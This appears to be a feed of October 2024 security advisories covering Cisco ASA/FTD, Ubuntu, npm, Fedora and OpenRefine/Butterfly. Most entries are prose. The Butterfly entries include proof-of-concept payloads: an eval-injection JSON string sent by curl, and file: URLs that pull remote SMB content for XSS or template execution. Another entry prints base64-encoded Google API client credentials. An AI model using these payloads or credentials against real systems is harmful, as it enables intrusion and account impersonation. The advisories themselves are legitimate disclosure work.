["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-CMD-INJ-2HBKA97G
23.10.2024 19:00:00	cisco	[CISCO-SA-CSC-DOS-XVPHM3BJ] Cisco Secure Client Software Denial of Service Vulnerability (medium)	A vulnerability in Internet Key Exchange version 2 (IKEv2) processing of Cisco Secure Client Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of Cisco Secure Client.This vulnerability is due to an integer underflow condition. An attacker could exploit this vulnerability by sending a crafted IKEv2 packet to an affected system. A successful exploit could allow the attacker to cause Cisco Secure Client Software to crash, resulting in a DoS condition on the client software.Note: Cisco Secure Client Software releases 4.10 and earlier were known as Cisco AnyConnect Secure Mobility Client.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CSC-DOS-XVPHM3BJ
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTDVIRTUAL-DOS-MUENGNYR] Cisco Adaptive Security Virtual Appliance and Secure Firewall Threat Defense Virtual SSL VPN Denial of Service Vulnerability (high)	A vulnerability in the VPN and management web servers of the Cisco Adaptive Security Virtual Appliance (ASAv) and Cisco Secure Firewall Threat Defense Virtual (FTDv), formerly Cisco Firepower Threat Defense Virtual, platforms could allow an unauthenticated, remote attacker to cause the virtual devices to run out of system memory, which could cause SSL VPN connection processing to slow down and eventually cease all together.This vulnerability is due to a lack of proper memory management for new incoming SSL/TLS connections on the virtual platforms. An attacker could exploit this vulnerability by sending a large number of new incoming SSL/TLS connections to the targeted virtual platform. A successful exploit could allow the attacker to deplete system memory, resulting in a denial of service (DoS) condition. The memory could be reclaimed slowly if the attack traffic is stopped, but a manual reload may be required to restore operations quickly.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTDVIRTUAL-DOS-MUENGNYR
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-XSS-YJJ7ZJVQ] Cisco Adaptive Security Appliance and Firepower Threat Defense Software VPN Web Client Services Cross-Site Scripting Vulnerabilities (medium)	Multiple vulnerabilities in the VPN web client services feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a browser that is accessing an affected device.These vulnerabilities are due to improper validation of user-supplied input to application endpoints. An attacker could exploit these vulnerabilities by persuading a user to follow a link designed to submit malicious input to the affected application. A successful exploit could allow the attacker to execute arbitrary HTML or script code in the browser in the context of the web services page.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-XSS-YJJ7ZJVQ
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-WEBVPN-DOS-HONB9PH4] Cisco Adaptive Security Appliance and Firepower Threat Defense Software SSL VPN Memory Management Denial of Service Vulnerability (high)	A vulnerability in the SSL VPN feature for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.This vulnerability is due to a logic error in memory management when the device is handling SSL VPN connections. An attacker could exploit this vulnerability by sending crafted SSL/TLS packets to the SSL VPN server of the affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-WEBVPN-DOS-HONB9PH4
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-SNMP-DOS-7TCNZXTU] Cisco Adaptive Security Appliance and Firepower Threat Defense Software SNMP Denial of Service Vulnerability (high)	A vulnerability in the Simple Network Management Protocol (SNMP) feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to cause an unexpected reload of the device.This vulnerability is due to insufficient input validation of SNMP packets. An attacker could exploit this vulnerability by sending a crafted SNMP request to an affected device using IPv4 or IPv6. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition. This vulnerability affects all versions of SNMP (versions 1, 2c, and 3) and requires a valid SNMP community string or valid SNMPv3 user credentials.For more information, see the Details ["#details"] section of this advisory.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-SNMP-DOS-7TCNZXTU
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-PERSIST-LCE-VU3EKMJ3] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability (high)	A vulnerability in the VPN web server of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerability.This vulnerability is due to improper validation of a specific file when it is read from system flash memory. An attacker could exploit this vulnerability by restoring a crafted backup file to an affected device. A successful exploit could allow the attacker to execute arbitrary code on the affected device after the next reload of the device, which could alter system behavior. Because the injected code could persist across device reboots, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-PERSIST-LCE-VU3EKMJ3
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-NSGACL-BYPASS-77XNEASL] Cisco Adaptive Security Appliance and Firepower Threat Defense Software NSG Access Control List Bypass Vulnerability (medium)	A vulnerability in the Network Service Group (NSG) feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access control list (ACL) and allow traffic that should be denied to flow through an affected device.This vulnerability is due to a logic error that occurs when NSG ACLs are populated on an affected device. An attacker could exploit this vulnerability by establishing a connection to the affected device. A successful exploit could allow the attacker to bypass configured ACL rules.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-NSGACL-BYPASS-77XNEASL
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-IKEV2-DOS-9FGEYHSF] Cisco Adaptive Security Appliance and Firepower Threat Defense Software IKEv2 VPN Denial of Service Vulnerability (high)	A vulnerability in the Internet Key Exchange version 2 (IKEv2) protocol for VPN termination of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted IKEv2 traffic to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-IKEV2-DOS-9FGEYHSF
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-DAP-DOS-BHEKP7N] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Dynamic Access Policies Denial of Service Vulnerability (high)	A vulnerability in the Dynamic Access Policies (DAP) feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to cause an affected device to reload unexpectedly. To exploit this vulnerability, an attacker would need valid remote access VPN user credentials on the affected device.This vulnerability is due to improper validation of data in HTTPS POST requests. An attacker could exploit this vulnerability by sending a crafted HTTPS POST request to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-DAP-DOS-BHEKP7N
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-BF-DOS-VDZHLQRW] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access VPN Brute Force Denial of Service Vulnerability (medium)	A vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of the RAVPN service.This vulnerability is due to resource exhaustion. An attacker could exploit this vulnerability by sending a large number of VPN authentication requests to an affected device. A successful exploit could allow the attacker to exhaust resources, resulting in a DoS of the RAVPN service on the affected device. Depending on the impact of the attack, a reload of the device may be required to restore the RAVPN service. Services that are not related to VPN are not affected.Cisco Talos discussed these attacks in the blog post Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials ["https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/"].Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-BF-DOS-VDZHLQRW
23.10.2024 19:00:00	cisco	[CISCO-SA-ASAFTD-ACL-BYPASS-VVNLNKQF] Cisco Adaptive Security Appliance and Firepower Threat Defense Software AnyConnect Access Control List Bypass Vulnerabilities (medium)	Multiple vulnerabilities in the AnyConnect firewall for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access control list (ACL) and allow traffic that should have been denied to flow through an affected device.These vulnerabilities are due to a logic error in populating group ACLs when an AnyConnect client establishes a new session toward an affected device. An attacker could exploit these vulnerabilities by establishing an AnyConnect connection to the affected device. A successful exploit could allow the attacker to bypass configured ACL rules.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-ACL-BYPASS-VVNLNKQF
23.10.2024 19:00:00	cisco	[CISCO-SA-ASA-VPN-NYH3FHP] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access SSL VPN Authentication Targeted Denial of Service Vulnerability (medium)	A vulnerability in the session authentication functionality of the Remote Access SSL VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to prevent users from authenticating.This vulnerability is due to insufficient entropy in the authentication process. An attacker could exploit this vulnerability by determining the handle of an authenticating user and using it to terminate their authentication session. A successful exploit could allow the attacker to force a user to restart the authentication process, preventing a legitimate user from establishing remote access VPN sessions.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-VPN-NYH3FHP
23.10.2024 19:00:00	cisco	[CISCO-SA-ASA-VPN-CZF8GT] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access VPN Denial of Service Vulnerability (high)	A vulnerability in the Remote Access VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition on an affected device.This vulnerability is due to improper validation of client key data after the TLS session is established. An attacker could exploit this vulnerability by sending a crafted key value to an affected system over the secure TLS session. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-VPN-CZF8GT
23.10.2024 19:00:00	cisco	[CISCO-SA-ASA-VPN-4GYEWMKG] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access SSL VPN Authentication Targeted Denial of Service Vulnerability (medium)	A vulnerability in the login authentication functionality of the Remote Access SSL VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to deny further VPN user authentications for several minutes, resulting in a temporary denial of service (DoS) condition.This vulnerability is due to ineffective handling of memory resources during the authentication process. An attacker could exploit this vulnerability by sending crafted packets, which could cause resource exhaustion of the authentication process. A successful exploit could allow the attacker to deny authentication for Remote Access SSL VPN users for several minutes, resulting in a temporary DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-VPN-4GYEWMKG
23.10.2024 19:00:00	cisco	[CISCO-SA-ASA-TLS-CWY6ZXB] Cisco Adaptive Security Appliance and Firepower Threat Defense Software TLS Denial of Service Vulnerability (high)	A vulnerability in the TLS cryptography functionality of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition.This vulnerability is due to improper data validation during the TLS 1.3 handshake. An attacker could exploit this vulnerability by sending a crafted TLS 1.3 packet to an affected system through a TLS 1.3-enabled listening socket. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.Note: This vulnerability can also impact the integrity of a device by causing VPN HostScan communication failures or file transfer failures when Cisco ASA Software is upgraded using Cisco Adaptive Security Device Manager (ASDM).Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-TLS-CWY6ZXB
23.10.2024 19:00:00	cisco	[CISCO-SA-ASA-SSH-RCE-GRAUPEUF] Cisco Adaptive Security Appliance Software SSH Remote Command Injection Vulnerability (critical)	A vulnerability in the SSH subsystem of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to execute operating system commands as root.This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by submitting crafted input when executing remote CLI commands over SSH. A successful exploit could allow the attacker to execute commands on the underlying operating system with root-level privileges. An attacker with limited user privileges could use this vulnerability to gain complete control over the system.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-SSH-RCE-GRAUPEUF
23.10.2024 19:00:00	cisco	[CISCO-SA-ASA-SSH-DOS-EEDWU5RM] Cisco Adaptive Security Appliance Software SSH Server Resource Denial of Service Vulnerability (medium)	A vulnerability in the SSH server of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition for the SSH server of an affected device.This vulnerability is due to a logic error when an SSH session is established. An attacker could exploit this vulnerability by sending crafted SSH messages to an affected device. A successful exploit could allow the attacker to exhaust available SSH resources on the affected device so that new SSH connections to the device are denied, resulting in a DoS condition. Existing SSH connections to the device would continue to function normally. The device must be rebooted manually to recover. However, user traffic would not be impacted and could be managed using a remote application such as Cisco Adaptive Security Device Manager (ASDM).Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-SSH-DOS-EEDWU5RM
23.10.2024 19:00:00	cisco	[CISCO-SA-ASA-FTD-PRIV-ESC-HBS9GNWQ] Cisco Adaptive Security Appliance and Firepower Threat Defense Software FXOS CLI Root Privilege Escalation Vulnerability (medium)	A vulnerability in the Cisco FXOS CLI feature on specific hardware platforms for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to elevate their administrative privileges to root. The attacker would need valid administrative credentials on the device to exploit this vulnerability.This vulnerability exists because certain system configurations and executable files have insecure storage and permissions. An attacker could exploit this vulnerability by authenticating on the device and then performing a series of steps that includes downloading malicious system files and accessing the Cisco FXOS CLI to configure the attack. A successful exploit could allow the attacker to obtain root access on the device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASA-FTD-PRIV-ESC-HBS9GNWQ
23.10.2024 09:46:51	ubuntu	[USN-7082-1] libheif vulnerability (high)	libheif could be made to crash or read sensitive data if it opened aspecially crafted file	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7082-1
23.10.2024 05:47:42	ubuntu	[USN-7081-1] Go vulnerabilities (high)	Several security issues were fixed in Go.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7081-1
23.10.2024 19:58:48	npm	[NPM:GHSA-M4GQ-X24J-JPMF] Prototype pollution vulnerability found in Mermaid's bundled version of DOMPurify (high)	The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.This affects the built:- `dist/mermaid.min.js`- `dist/mermaid.js`- `dist/mermaid.esm.mjs`- `dist/mermaid.esm.min.mjs`This will also affect users that use the above files via a CDN link, e.g. `https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js`Users that use the default NPM export of `mermaid`, e.g. `import mermaid from 'mermaid'`, or the `dist/mermaid.core.mjs` file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like `npm audit fix`.### Patches- `develop` branch: 6c785c93166c151d27d328ddf68a13d9d65adc00- backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M4GQ-X24J-JPMF
23.10.2024 17:58:53	almalinux	[ALSA-2024:8327] grafana security update (important)	grafana security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8327
25.10.2024 05:09:17	fedora	[FEDORA-2024-9c84a7c963] Fedora 40: libtiff	fix CVE-2024-7006 (rhbz#2302997)fix CVE-2023-52356 (rhbz#2260112)fix CVE-2023-6228 (rhbz#2251863)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9c84a7c963
24.10.2024 21:32:41	maven	[MAVEN:GHSA-QFWQ-6JH6-8XX4] OpenRefine has a path traversal in LoadLanguageCommand (high)	The load-language command expects a `lang` parameter from which it constructs the path of the localization file to load, of the form `translations-$LANG.json`.When doing so, it does not check that the resulting path is in the expected directory, which means that this command could be exploited to read other JSON files on the file system.The command should be patched by checking that the normalized path is in the expected directory.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QFWQ-6JH6-8XX4
24.10.2024 21:30:01	maven	[MAVEN:GHSA-3PG4-QWC8-426R] OpenRefine leaks Google API credentials in releases (high)	### ImpactOpenRefine releases contain Google API authentication keys ("client id" and "client secret") which can be extracted from released artifacts. For instance, download the package for OpenRefine 3.8.2 on linux. It contains the file `openrefine-3.8.2/webapp/extensions/gdata/module/MOD-INF/lib/openrefine-gdata.jar`, which can be extracted.This archive then contains the file `com/google/refine/extension/gdata/GoogleAPIExtension.java`, which contains the following lines:```java // For a production release, the second parameter (default value) can be set // for the following three properties (client_id, client_secret, and API key) to // the production values from the Google API console private static final String CLIENT_ID = System.getProperty("ext.gdata.clientid", new String(Base64.getDecoder().decode("ODk1NTU1ODQzNjMwLWhkZWwyN3NxMDM5ZjFwMmZ0aGE2M2VvcWFpY2JwamZoLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29t"))); private static final String CLIENT_SECRET = System.getProperty("ext.gdata.clientsecret", new String(Base64.getDecoder().decode("R2V2TnZiTnA2a3IxeDd5c3VZNENmYlNo")));```The Base64 encoding can then be decoded to obtain the client id and client secret.Those credentials can then be used by other applications to request access to Google accounts, pretending they are OpenRefine. This assumes that they also get access to the user access tokens, which this vulnerability doesn't expose by itself.### PatchesThe bundled credentials should be revoked.### WorkaroundsUsers should revoke access to their Google account if they have connected it to OpenRefine.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3PG4-QWC8-426R
24.10.2024 21:27:51	maven	[MAVEN:GHSA-MPCW-3J5P-P99X] Butterfly's parseJSON, getJSON functions eval malicious input, leading to remote code execution (RCE) (moderate)	### SummaryUsage of the `Butterfly.prototype.parseJSON` or `getJSON` functions on an attacker-controlled crafted input string allows the attacker to execute arbitrary JavaScript code on the server.Since Butterfly JavaScript code has access to Java classes, it can run arbitrary programs.### DetailsThe `parseJSON` function (edu/mit/simile/butterfly/Butterfly.js:64) works by calling `eval`, an approach that goes back to the original library by Crockford, before JSON was part of the ECMAScript language. It uses a regular expression to remove strings from the input, then checks that there are no unexpected characters in the non-string remainder.However, the regex is imperfect, as was [discovered earlier by Mike Samuel](https://dev.to/mikesamuel/2008-silently-securing-jsonparse-5cbb); specifically, the "cleaner" can be tricked into treating part of the input as a string that the "evaluator" does not, because of a difference in interpretation regarding the [the Unicode zero-width joiner character](https://unicode-explorer.com/c/200D). Representing that character with a visible symbol, a malicious input looks like:```js"\�\", Packages.java.lang.Runtime.getRuntime().exec('gnome-calculator')) // "```This is understood...* by `JSON_cleaning_RE` as a single string, and because it is a string it can be collapsed to nothing, which is not problematic, so the original input proceeds to `eval`.* by the `eval` function, which ignores zero-width joiners entirely, as a string containing a single escaped backslash, followed by a comma, then a function call, closing parenthesis, and finally a line comment. The function call is evaluated, and a calculator is opened.Possible mitigations and additional defenses could include:* Replacing the JSON implementation with Rhino's built-in implementation.* Dropping all JSON-related and JSONP-related code entirely.* Restricting the access the JavaScript controller code has to the rest of the system by using `initSafeStandardObjects` instead of `initStandardObjects`, using `setClassShutter`, and so on.### PoCChange OpenRefine `core` `controller.js` to add a call to the vulnerable `getJSON` function:```diffdiff --git a/main/webapp/modules/core/MOD-INF/controller.js b/main/webapp/modules/core/MOD-INF/controller.jsindex 4ceba0676..1ce0936d2 100644--- a/main/webapp/modules/core/MOD-INF/controller.js+++ b/main/webapp/modules/core/MOD-INF/controller.js@@ -631,0 +632,5 @@ function process(path, request, response) {+ if (path == "getjsontest") {+ butterfly.getJSON(request);+ return true;+ }+```Then, restart OpenRefine and submit the malicious request. For example, the following `bash` command (with $' quoting) should do it:```curl -H 'Content-Type: application/json;charset=utf-8' --data $'"\\\u200d\\", Packages.java.lang.Runtime.getRuntime().exec(\'gnome-calculator\')) // "' http://localhost:3333/getjsontest```### ImpactAny JavaScript controller that calls one of these functions is vulnerable to remote code execution.OpenRefine itself seems unaffected; both OpenRefine and jQuery have their own functions also called parseJSON and getJSON, but those are unrelated.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MPCW-3J5P-P99X
25.10.2024 00:46:19	maven	[MAVEN:GHSA-3P8V-W8MR-M3X8] Butterfly has path/URL confusion in resource handling leading to multiple weaknesses (critical)	### SummaryThe Butterfly framework uses the `java.net.URL` class to refer to (what are expected to be) local resource files, like images or templates. This works: "opening a connection" to these URLs opens the local file. However, if a `file:/` URL is directly given where a relative path (resource name) is expected, this is also accepted in some code paths; the app then fetches the file, from a remote machine if indicated, and uses it as if it was a trusted part of the app's codebase.This leads to multiple weaknesses and potential weaknesses:* An attacker that has network access to the application could use it to gain access to files, either on the the server's filesystem (path traversal) or shared by nearby machines (server-side request forgery with e.g. SMB).* An attacker that can lead or redirect a user to a crafted URL belonging to the app could cause arbitrary attacker-controlled JavaScript to be loaded in the victim's browser (cross-site scripting).* If an app is written in such a way that an attacker can influence the resource name used for a template, that attacker could cause the app to fetch and execute an attacker-controlled template (remote code execution).### DetailsThe `edu.mit.simile.butterfly.ButterflyModuleImpl.getResource` method converts a resource name into an URL, for instance:```images/logo-gem-126.svgfile:/C:/Users/Wander/IdeaProjects/OpenRefine/main/webapp/modules/core/images/logo-gem-126.svg```If the resource name already starts with `file:/`, it is passed through unmodified (line 287). There is no check that the resulting URL is inside the expected directory or on the same machine.The default implementation for `process` in `ButterflyModuleImpl` is to serve a named resource, which makes it vulnerable. The Velocity template library is bound to the same `getResource` implementation through the `ButterflyResourceLoader` class, which means it is also vulnerable if template resource names can somehow be influenced by an attacker.### PoCThis demonstration has been tested with [OpenRefine](https://github.com/OpenRefine/OpenRefine) on a Windows machine. Start OpenRefine, create a file (here `example.js`) with some contents, then concatenate the OpenRefine URL and its `file:/` URL, as follows: http://localhost:3333/file:/C:/Users/Wander/example.jsThe file is read and sent to the browser. Then, visit: http://localhost:3333/file:%2f%2fwandernauta.nl/public/demo.htmlAssuming there are no firewalls in the way, the HTML page is retrieved from the public SMB (Samba) network share and sent to the browser, which executes the embedded JavaScript.In the case of OpenRefine specifically, to demonstrate the attacker-controlled template name case: http://localhost:3333/file:%2f%2fwandernauta.nl/public/indexAn `index.vt` template containing the snippet above is retrieved from the same share, which is then executed; the Windows calculator opens.### ImpactDepending on how the framework is used: path traversal, XSS, SSRF; potentially RCE.	